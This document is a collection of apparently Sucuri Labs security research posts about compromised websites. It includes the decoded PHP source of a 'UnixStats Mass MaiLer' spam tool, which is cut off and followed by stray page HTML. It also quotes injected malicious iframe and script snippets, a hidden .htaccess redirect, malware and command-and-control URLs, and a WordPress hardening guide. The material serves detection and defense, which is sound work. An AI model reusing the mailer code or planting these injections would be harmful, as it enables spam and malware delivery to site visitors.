bookmark_borderPHP Spam tool (UnixStats Mass MaiLer)

While looking at a compromised site, we found an interesting mass mailer in there. The content was encoded using eval/gzinflate and base64_decode:

But when switching the “eval” for “print” we could see the mass mailer hidden and what it was doing:

$secure = “racrewmania@googlemail.com”; @$action=$_POST[‘action’]; @$from=$_POST[‘from’]; @$realname=$_POST[‘realname’]; @$replyto=$_POST[‘replyto’]; @$subject=$_POST[‘subject’]; @$message=$_POST[‘message’]; @$emaillist=$_POST[’emaillist’]; @$file_name=$_FILES[‘file’][‘name’]; @$contenttype=$_POST[‘contenttype’]; @$file=$_FILES[‘file’][‘tmp_name’]; @$amount=$_POST[‘amount’]; set_time_limit(intval($_POST[‘timelimit’])); ..<title>UnixStats Mass MaiLer</title>..for($xx=0; $xx<$amount; $xx++){ for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(” “, “”, $to); $message = ereg_replace(“&email&”, $to, $message); $subject = ereg_replace(“&email&”, $to, $subject); print “Sending mail to $to…….”; flush(); $header = “From: $realname <$from>rnReply-To: $replytorn”; $header .= “MIME-Version: 1.0rn”; If ($file_name) $header .= “Content-Type: multipart/mixed; boundary=$uidrn”; If ($file_name) $header .= “–$uidrn”; $header .= “Content-Type: text/$contenttypern”; $header .= “Content-Transfer-Encoding: 8bitrnrn”; $header .= “$messagern”; If ($file_name) $header .= “–$uidrn”; If ($file_name) $header .= “Content-Type: $file_type; name=”$file_name””rn””; If ($file_name) $header .= “”Content-Transfer-Encoding: base64rn””; If ($file_name) $header .= “”Content-Disposition: attachment; filename=””$file_name””rnrn””; If ($file_name) $header .= “”$contentrn””; If ($file_name) $header .= “”–$uid–“”; mail($to</p></div></article></main></div></div><div><nav class=”navigation post-navigation” role=”navigation” aria-label=”Posts”><h2 class=”screen-reader-text”>Post navigation</h2><div class=”nav-links”><div class=”nav-previous”><a href=”https://labs.sucuri.net/flagging-google-com-as-malware/” rel=”prev”>Flagging google.com as malware</a></div><div class=”nav-next”><a href=”https://labs.sucuri.net/strange-htaccess-redirections-to-google-com/” rel=”next”>Strange .htaccess redirections to google.com</a></div></div></nav></div><footer id=”colophon” class=”site-footer”><div class=”site-info”> <a href=”https://wordpress.org/”> Proudly powered by WordPress </a> <span class=”sep”> | </span> Theme: sucurikb by <a href=”http://underscores.me/”>Underscores.me</a>.</div></footer></div><footer id=”sucuri-docs-footer”><div class=”sucuri-docs-footer-container”><div class=”grid-container”><div class=”grid-x grid-margin-x”><div class=”cell large-2″><p class=”sucuri-docs-footer-menu-heading”>PRODUCTS</p><div class=”menu-products-container”><ul id=”menu-products” class=”menu”><li id=”menu-item-595″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-595″><a href=”https://sucuri.net/website-firewall/”>Website Firewall</a></li><li id=”menu-item-596″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-596″><a href=”https://sucuri.net/website-security-platform/”>Website Antivirus</a></li><li id=”menu-item-597″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-597″><a href=”https://sucuri.net/website-backups/”>Website Backups</a></li><li id=”menu-item-598″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-598″><a href=”https://sucuri.net/wordpress-security/”>WordPress Security</a></li><li id=”menu-item-599″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-599″><a href=”https://sucuri.net/custom/enterprise/”>Enterprise Services</a></li></ul></div></div><div class=”cell large-2″><p class=”sucuri-docs-footer-menu-heading”>SOLUTIONS</p><div class=”menu-solutions-container”><ul id=”menu-solutions” class=”menu”><li id=”menu-item-606″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-606″><a href=”https://sucuri.net/website-firewall/ddos-protection”>DDoS Protection</a></li><li id=”menu-item-607″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-607″><a href=”https://sucuri.net/website-security-platform/malware-scanning-and-detection”>Malware Detection</a></li><li id=”menu-item-608″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-608″><a href=”https://sucuri.net/website-security-platform/malware-removal”>Malware Removal</a></li><li id=”menu-item-609″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-609″><a href=”https://sucuri.net/website-firewall/stop-website-attacks-and-hacks”>Malware Prevention</a></li><li id=”menu-item-610″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-610″><a href=”https://sucuri.net/website-security-platform/blacklist-removal-and-repair”>Blacklist Removal</a></li></ul></div></div><div class=”cell large-2″><p class=”sucuri-docs-footer-menu-heading”>SUPPORT</p><div class=”menu-support-container”><ul id=”menu-support” class=”menu”><li id=”menu-item-600″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-600″><a href=”https://blog.sucuri.net/”>Blog</a></li><li id=”menu-item-601″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-601″><a href=”https://kb.sucuri.net/”>Knowledge Base</a></li><li id=”menu-item-602″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-602″><a href=”https://sitecheck.sucuri.net/”>SiteCheck</a></li><li id=”menu-item-603″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-603″><a href=”https://labs.sucuri.net/”>Research Labs</a></li><li id=”menu-item-604″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-604″><a href=”https://sucuri.net/faq”>FAQ</a></li><li id=”menu-item-605″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-605″><a href=”https://abuse.sucuri.net/”>Report Abuse</a></li></ul></div></div><div class=”cell large-2″><p class=”sucuri-docs-footer-menu-heading”>COMPANY</p><div class=”menu-company-container”><ul id=”menu-company” class=”menu”><li id=”menu-item-611″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-611″><a href=”https://sucuri.net/company”>About</a></li><li id=”menu-item-612″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-612″><a href=”https://sucuri.net/company/media”>Media</a></li><li id=”menu-item-613″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-613″><a href=”https://sucuri.net/company/events”>Events</a></li><li id=”menu-item-614″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-614″><a href=”https://sucuri.net/company/employment”>Employment</a></li><li id=”menu-item-615″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-615″><a href=”https://sucuri.net/company/contact-us”>Contact</a></li><li id=”menu-item-616″ class=”menu-item menu-item-type-custom menu-item-object-custom menu-item-616″><a href=”https://sucuri.net/customers/”>Testimonials</a></li></ul></div></div><div class=”cell large-4 text-center”><div class=”footer-social-icons”><ul class=”list-inline”><li class=”list-inline-item”><a class=”p-ft-social-fb” href=”https://www.facebook.com/SucuriSecurity” target=”_blank” rel=”noopener noreferrer”><i class=”social-icon facebook”></i></a></li><li class=”list-inline-item”><a class=”p-ft-social-tw” href=”https://twitter.com/sucurisecurity” target=”_blank” rel=”noopener noreferrer”><i class=”social-icon twitter”></i></a></li><li class=”list-inline-item”><a class=”p-ft-social-ld” href=”https://www.linkedin.com/company/899487″ target=”_blank” rel=”noopener noreferrer”><i class=”social-icon linkedin”></i></a></li><li class=”list-inline-item”><a class=”p-ft-social-ig” href=”https://www.instagram.com/sucurisecurity/” target=”_blank” rel=”noopener noreferrer”><i class=”social-icon instagram”></i></a></li></ul></div><div><p><a href=”https://dashboard.sucuri.net/login/” class=”btn login mp-ft-login auto-track” data-gatrack=”Button_Click, Footer_Login”>Customer Login</a></p></div><div class=”footer-logo-wrapper”> <a href=”/” class=”footer-logo”></a></div></div></div></div><div class=”grid-container sucuri-docs-footer-b”><hr><div class=”grid-x grid-margin-x”><div class=”cell medium-8 large-8″><ul class=”list-inline unstyled-list”><li class=”list-inline-item”><a class=”mp-ft-copyright-terms auto-track” data-gatrack=”Button_Click, Footer_Terms_Of_Use” href=”/terms-of-service”>Terms of Use</a></li><li class=”list-inline-item”><a class=”mp-ft-copyright-priv auto-track” data-gatrack=”Button_Click, Footer_Privacy_Policy” href=”/privacy-policy”>Privacy Policy</a></li><li class=”list-inline-item”><a class=”mp-ft-copyright-faq auto-track” data-gatrack=”Button_Click, Footer_FAQ” href=”/faq”>Frequently Asked Questions</a></li></ul></div><div class=”cell medium-4 large-4 copyright text-center”><p>© 2020 Sucuri Inc. All rights reserved.</p></div></div></div></div></footer> <script src=”https://labs.sucuri.net/wp-content/cache/min/1/7a7f2154ed98976f1f4d0d6faaeb245e.js” data-minify=”1″></script></body></html></p>

bookmark_borderWordPress and Server Hardening – Taking Security to Another Level

The biggest problem today with most content management systems (CMS) and web applications is the adoption of what we call the “Win95 security model”. Do you remember the Windows 95 security model? With everything running under the admin role? No separation of privileges? No separation of processes? One vulnerability and you take it all?

Confused as to how this relates to today’s CMS’s (including WordPress, Joomla, and others)? Let us explain using WordPress as an example (most popular CMS out there):

  1. The user that is running WordPress (including any plugin or theme) can modify any file on the site.
  2. Any URL can be accessed directly, even when they are not supposed to be used that way.
  3. The admin panel (wp-admin) runs in the same domain and within the same codebase/permissions as the rest of the application.
  4. Admin users can install any plugin/theme, which can then modify any file and change anything in the database
  5. Most users log in as admin, even though they don’t need “admin” access most of the time.
  6. Every plugin and theme has the same level of access (and permissions) as the core of the application (no separation of privileges).

Yes, this is the default and most common way to install WordPress, specifically on shared hosts. Why you ask? It is easy to install and configure, but definitely not to be confused with the correct or secure approach to installing any application.

Imagine, it’s like having one username and password for all your accounts… oh… wait…

Improving Your Security Posture

I should preface this by saying that this won’t apply to shared environments, sorry… 🙁

But if you’re on a dedicated (or VPS) environment you’re in luck so read on.

1- Correcting Server Access Control

The user running WordPress (generally www-data or apache) should not have permissions to modify any file.

That protects you in case there is a vulnerability in any plugin, theme (or even in WordPress itself), since they won’t be able to modify anything.

Fortunately, there is an easy fix but one that many won’t use. In most instances WordPress is running as apache/apache, default webserver roles, and what you want to do is create a new user that will assume that role, disallowing the webserver user from having those rights.

To do this, this is what you have to do:

# adduser wordpressuser
# cd /var/www/pathtoyoursite
# chown -R wordpressuser .
# chmod -R 750 .
# chgrp -R apache .

This makes it so that only the wordpressuser user is the only one with with write permissions to your site directory.

Now, we all know that the only directory that needs to be writeable is the uploads directory in WordPress. So, to accomodate this we make some slight modifications that adds a rule allowing our beloved Apache user to write to that directory:

# chmod -R 770 ./wp-content/uploads/

Now, to ensure that we’re taking every precaution possible we turn to our .htaccess file to protect us from the injection of backdoors. You’ll want to create the .htaccess file inside the /wp-content/uploads directory:

php_flag engine off

and

<Files *.php>
deny from all
</Files>

InfoSec is about risk reduction, by taking these additional steps you have now greatly reduced the inherent access control risk associated with default WordPress installations. Do note however that this is not isolated to WordPress, these can also be applied to Joomla, Drupal and other such CMS applications.

Disclaimer for my colleagues: Doing this change will require you to take a more proactive approach to the administration of your site. You won’t be able to use the pretty GUI’s WordPress offers you, you’ll have to manually update your core, themes, and plugins. But trust me, it’s ok, it’s only slightly inconvenient.

2- The Accessibility Challenge

WordPress has many files, but very few of them need to be accessed directly by the users. To prevent files being accessed directly, we recommend blocking direct PHP access to /wp-content with the following additions to your .htaccess file:

<Files *.php>
deny from all
</Files>

An example of how this would have been useful, let’s think back to the TimThumb outbreak last year or even this year’s Uploadify discussions. Killing the execution of PHP in /wp-content would have and will protect you from both these known vulnerabilities.

3- Correcting Application Access Control

The admin panel (wp-admin) runs on the same domain and same privileges as the rest of the application. In a perfect world, it would be isolated, but to minimize issues, we recommend adding two restrictions to wp-admin access (via .htaccess):

3.1- Only allowing certain IP addresses:

order allow, deny
allow from IP1
allow from IP2
deny from all

3.2- Adding an additional user/pass (pre-authentication):

AuthUserFile /var/www/mysite/.htpasswd
AuthName “Site private access”
AuthType Basic
require user myuser2

By adding those two restrictions, you isolate wp-admin, requiring additional permissions and again, improve the security model. Hope you’re starting to get the trend of the post.

4- Restrict admin access to only required users

On the old days of Windows, everyone was admin. Don’t do the same on WordPress. If someone needs to write posts, they only need author permission. If someone needs to edit/post articles, he only needs editor permission.

There is a reason that out of the box WordPress provides varying degrees of roles and associated permissions, use them. We realize they may be a bit complex and difficult to understand, hopefully this helps:

  • Administrator – can do everything
  • Editor – They write stuff, more importantly they can publish
  • Contributor – The Author’s cousin, but they can’t publish
  • Subscriber – They follow your rants about your favorite past times but can’t do anything else

Logging in as Admin for every task is foolish, don’t be that person.

Summarizing the journey

Above we addressed 4 steps, that if employed, covers 5 distinct sections in the security model I prefaced the post with:

  1. The user that is running WordPress (including any plugin or theme) can modify any file on the site
  2. Any URL can be accessed directly, even when they are not supposed to be used that way
  3. The admin panel (wp-admin) runs in the same domain and within the same codebase/permission as the rest of the application.
  4. Admin users can install any plugin/theme, which can then modify any file or change anything in the database
  5. Most users log in as admin, even though they don’t need “admin” access most of the time

By employing some, ok all of the recommendations above you have effectively disabled WordPress from modifying its own files, admin users no longer have write permission to all files, and the themes / plugins can’t modify everything. Why are these three areas important? Well, because they are the most exploited vectors to date.

If you think this is all, you’re wrong, I would prefer to see updates where the plugins / themes no longer have the same level of permissions as the core of the application and their ability to have full database access (read/write) are dismissed, but, I don’t want to give the appearance that I’m paranoid.

But seriously, in a perfect set up, you would have at least 2 database users, one configured on wp-admin with write access, and one for the rest of the site with only read access. I’m just saying..

bookmark_borderStrange Malware from cdnexit.com

We are seeing thousands of sites compromised with an iframe from cndexit.com:

This is the iframe that we detected:

http://cdn.cdnexit.com/Home/detect/index.php

Google has already flagged this domain and found it to be responsible for the infection of more than 1.5k sites:

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, cdnexit.com appeared to function as an intermediary for the infection of 1509 site(s) including txt.ir/, remedios-naturais.com/, pornupload.com/.

We can’t say for sure how sites got hacked, but we will post more details when we have them.

bookmark_borderYour know there is a vulnerability in Plesk when..

This is a simple way to know when a vulnerability in Plesk (or any other software) is being exploited in the wild:

When the mass scans for it starts. The data is from ISC (isc.sans.org) and shows a massive increase in thenumber of queries for port 8443 (used by Plesk).

bookmark_borderTop malware entry stats.php

Top malware entry for the day: poseyhumane.org/stats.php

<iframe src="http://poseyhumane.org/stats.php" name="Twitter"..
 scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>

It seems to be the stats.php malware of the day. Related to our post here: Distributed Malware Network Outbreak Using Stats.php.

We also identified a CC (command and control server) for these infections: http://botstatisticupdate.com/stat/stat.php. More info to come soon.

bookmark_borderStrange .htaccess redirections to google.com

A few weeks ago we reported the case of a few compromised sites with an .htaccess redirection to msn.com. Now we areseeing a few sites with the same redirection but to google.com.

This is what we are seeing on some hacked sites (.htaccess file):

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://google.com [R=301,L]

.. lots of empty lines/ white spaces ...
ErrorDocument 404 http://google.com

We have no idea why this hapening. Maybe a bug in the attackers malware injection code, but we can\’t say for sure. We will post more details when we find out what is going on.

bookmark_borderChangeIP (dynamic DNS) malware

If you look at the top domains distributing malware for the last days (and months), what do you see in common?

#numberofsitesinfected #type #malwaredomain
650 iframe  http://cvrtyi.ddns.info/nighttrend.cgi?8
315 iframe  http://byiegfs.ddns.info/nighttrend.cgi?8
275 iframe  http://ileshdg.qhigh.com/nighttrend.cgi?8
179 iframe  http://sdcmd.freewww.info/nighttrend.cgi?8
159 iframe  http://lmybv.ddns.name/nighttrend.cgi?8
148 iframe  http://wstckewb.freewww.biz/nighttrend.cgi?8
146 iframe  http://zqajsv.qhigh.com/nighttrend.cgi?8
126 iframe  http://avvof.sellClassics.com/nighttrend.cgi?8
116 iframe  http://wnevt.pcanywhere.net/nighttrend.cgi?8
101 iframe  http://acijwfr.freewww.info/nighttrend.cgi?8
93  iframe  http://cqcsk.ddns.name/facebook.cgi?8
84  iframe  http://thcolxbbt.qhigh.com/facebook.cgi?8
77  iframe  http://bwnzgtv.qhigh.com/facebook.cgi?8
74  iframe  http://anmvmhz.ddns.info/facebook.cgi?8
73  iframe  http://hbuwmx.myddns.com/facebook.cgi?8
72  iframe  http://qizkfd.mynumber.org/facebook.cgi?8

Most of them are using a ChangeIP.com (dynamic DNS) sub domain as the first level of injection. Just check ddns.info, qhigh.com,mynumber.org, pcanywhere.net, etc, etc. They are all part of: http://www.changeip.com/. Just in the last 60 days, weidentified more than 15,000 different sub domains from them being used to distribute malware.

Don\’t get us wrong, Dynamic DNS is a very useful service, but we would love if they would implement more serious filtering/blacklistingand some type of captcha to prevent their service from being abused by criminals.

However, in the current state, we can only recommend against using their service to avoid being thrown in the mix with thethousands of malicious domains that they host.

*If you look past 6 months ago, .co.cc was the main domain distributing malware, but since it was shut down, the attackers have migrated to changeip.com. Hopefully they will do something about it.

bookmark_borderGCCanada.com Malware

We are seeing a large amount of sites with a malscript from gccanada.com injected into them. The malware redirects visitors to searchmagnified.com, which redirects them to freeresultsguide.com. That’s the code being added to the hacked sites:

script type=’text/javascript’ src=”http://gccanada[.]com/jquery[.]js

What is so bad about it? The final domain \’freeresultsguide.com\’, pushes you to buy a fake anti virus software with some annoying messages and warnings:

Important security message. Please call the number provided asap to get your computer fixed. You have a virus!

If you see this gcanada code on your site, it means you got hacked. It is not from the Government of Canada, as they want you to think.